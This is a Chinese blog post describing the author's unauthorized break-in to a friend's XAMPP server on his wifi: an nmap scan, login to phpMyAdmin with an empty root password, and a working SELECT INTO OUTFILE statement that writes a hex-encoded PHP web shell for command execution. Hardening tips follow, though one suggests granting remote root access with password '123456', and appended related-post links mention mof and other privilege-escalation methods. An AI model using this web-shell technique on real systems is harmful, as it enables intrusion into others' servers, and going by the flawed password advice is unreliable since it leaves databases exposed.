mysql提权软件后门_Mysql提权留后门
记录一次关于无聊时对基友MYSQL服务器的提权攻击。
尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式。
0x01.从无聊的nmap扫描开始
今晚无聊时候,本想打开电脑扫下谁连进我wifi,无意间,眼睛一亮看到了一个惊喜。
看到80端口,就有种冲动想要进去,进去后发现forbidden,然后试了试 phpmyadmin,发现直接进去,因为基友用的XAMPP集成环境,一下就猜到空密码。
登进去后,就想办法留个后门,搞个木马。注意一下,mysql是以管理员权限运行的,so...
查了下资料,这个很简单,网上很多。
找个一个表进去,用下面那句话,就搞定了。
SELECT 0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E FROM user into outfile '/Applications/XAMPP/xamppfiles/phpmyadmin/fuck.php'
那一串字符就是 <?php system($_REQUEST[cmd]);?> 的十六进制编码了,只要路径对,就ok了。
进去以后,只要访问 /phpmyadmin/fuck.php?cmd= 就能直接打terminal命令了。
可以看到我输入ls /输出了跟目录下面的文件和文件夹。
这个时候,如果是win党,来个中国菜刀!!!啊啊啊,条子!!带走!!!
0x02.关于Xampp安全(MAC环境)
下面说下个人经历,关于MAC下,xampp环境的安全处理。
A.关闭phpmyadmin远程登录
vim /Applications/XAMPP/xamppfiles/etc/extra/http-xmapp.conf
在最底下添加访问权限,以及关闭修改权限。
Require local
ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var
B.关闭Http远程访问权限
vim /Applications/XAMPP/xamppfiles/apache2/conf/httpd.conf
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Deny from all #拒绝远程访问
C.关于Mysql文件写入权限
这里不是所有都能写入的,只要关闭了用户写入权限,就不能写入木马了。这个时候,就需要对xampp配置做处理下。
这是我本地测试:
关闭mysql写入文件权限(我本地的):
vim /Applications/XAMPP/xamppfiles/etc/extra/http-xmapp.conf
# since XAMPP 1.4.3
AllowOverride AuthConfig Limit
Require all granted
不管怎么样,反正记得,创建的文件夹,非不得已,不要 chmod 777,特别是upload等目录,注意防范。
D.修改Mysql密码
1、进入到phpmyadmin后,直接执行SQL语句:
update user set password=password('123456') where User='root'
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
2、直接修改
vim /Applications/XAMPP/xamppfiles/etc/my.conf
找到19行:
password = your_password
0x03.关于xmapp的一些环境
1、端口占用问题(最常见的)
Http 80端口configure在:
/Applications/XAMPP/xamppfiles/etc/httpd.conf
52行:
Mysql 3306端口configure在:
/Applications/XAMPP/xamppfiles/etc/my.conf
20行
2、添加vhost
/Applications/XAMPP/xamppfiles/etc/extra/http-vhost.conf
3、配置Mysql缓存大小
大多数的MySQL服务器都开启了查询缓存。这是提高性最有效的方法之一,而且这是被MySQL的数据库引擎处理的。当有很多相同的查询被执行了多次的时候,这些查询结果会被放到一个缓存中,这样,后续的相同的查询就不用操作表而直接访问缓存结果了。
/Applications/XAMPP/xamppfiles/etc/httpd.conf
最后面:
[isamchk]
key_buffer = 20M
sort_buffer_size = 20M
read_buffer = 2M
write_buffer = 2M
-by小草
2014-12-27 02:46:38
mysql提权软件后门_Mysql提权留后门相关推荐
- mysql ntfs 提权 (errcode: 22)_mysql 提权总结
1.MOF提权 简单的说mof就是系统内部的一个程序,每隔一定时间系统就会以root权限去执行,我们将其替换然后执行我们的而已攻击代码.此举称之为mof提权. 以下便是脚本: 1 #pragma na ...
- mysql mof提权_MySQL提权之mof提权
mof提权原理 关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次 ...
- 提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权
一.初识提权 很多时候我们入侵一个网站的时候,想要的是得到这个服务器的权限,也就是admin权限,但是一般默认得到的是普通用的地权限,权限很小,所以就要通过其他手段,提升自己的权限. 提权是将服务器的 ...
- mysql mof提权原理_[原创]WEB安全第六章提权篇12 mof提权
WEB安全第六章提权篇12 mof提权 1.mof是什么 托管对象格式 (MOF) 文件是创建和注册提供程序.事件类别和事件的简便方法.在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译.编 ...
- 后渗透篇:Windows 2008 server提权之突破系统权限安装shift后门
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 Windows 2008 server提权之突破系统权限安装shift后门 0x01 前言 0x02 主要操作部分 0x03 主要命令组成 ...
- 系统提权之:Windows 提权
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...
- 提权学习:第三方软件提权(FileZilla 提权)14147
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 FileZilla 提权 0x01 介绍 0x02 提权思路 0x03 操作演示 0x04 拓展知识 提权的思路就以下几种: 这篇文章直接 ...
- 【数据库提权】- SQL Server提权
渗透测试往往由信息收集开始,而提权是渗透测试中较为重要的环节,若始终以"低权限"身份进行渗透,测试出的问题相对于高权限的质量会低很多,权限提升意味着用户获得不允许他使用的权限.比如 ...
- 提权学习:第三方软件提权(Server-u 提权)43958
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 第三方软件提权 Server-u 提权 Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2 ...
最新文章
- python传递指针_使用Python / C API传递C指针
- js正则--验证6-12位至少包含数字、小写字母和大些字母中至少两种字符,
- 用jar 命令打包war包
- oracle data guard闪回,11gR2 Active Data Guard 闪回 - flashback database / snapshot standby - 2
- Oracle闪回技术(Flashback)
- PHP获取当前脚本内存占用情况
- 四款优秀的源代码扫描工具简介
- IOS面试题(收集整理)
- Unity发布WebGL后跳转页面的问题
- 服务器排队系统怎么做,多服务器排队系统的平均排队时间的近似分析
- esmm/Entire Space Multi-Task Model- An Effective Approach for Estimating Post-Click Conversion Rate
- 各种带有物理学特点的把妹法[转]
- TOP15 科幻小说系列
- OMV搭建系列教程[5] – 安装Aria2
- IJCAI2021强化学习相关论文集合推荐
- 超高精度时间频率同步及其应用
- sap 新增科目表_SAP系统中四大科目表的总结
- 插入u盘需重启计算机,电脑一插u盘就重启的原因及其解决方案
- 以业务为核心的云原生体系建设
- JavaScript字符串对象
热门文章
- C++青少年编程课程体系与教案
- 表达式运算(包含大整数加减乘)
- Unity 3d 摄像头
- 靖哥哥教你如果拦截去除弹窗广告
- 如果们正预测基本面子
- 2022年全球颈椎按摩仪市场前景分析及研究报告
- darknet出现以下错误 /home/ubtu/anaconda3/lib/libQt5Core.so.5:对‘ucnv_toUnicode_58’未定义的引用
- java holder详解_connection holder is null 异常详解
- laravel-集合对象的销毁forget,重组values(),pluck ()方法
- Spring Data ElasticSearch analyzer 定义 @Filed失效 @Mapping失效 创建索引 无效 解决办法 ElasticsearchRestTemplate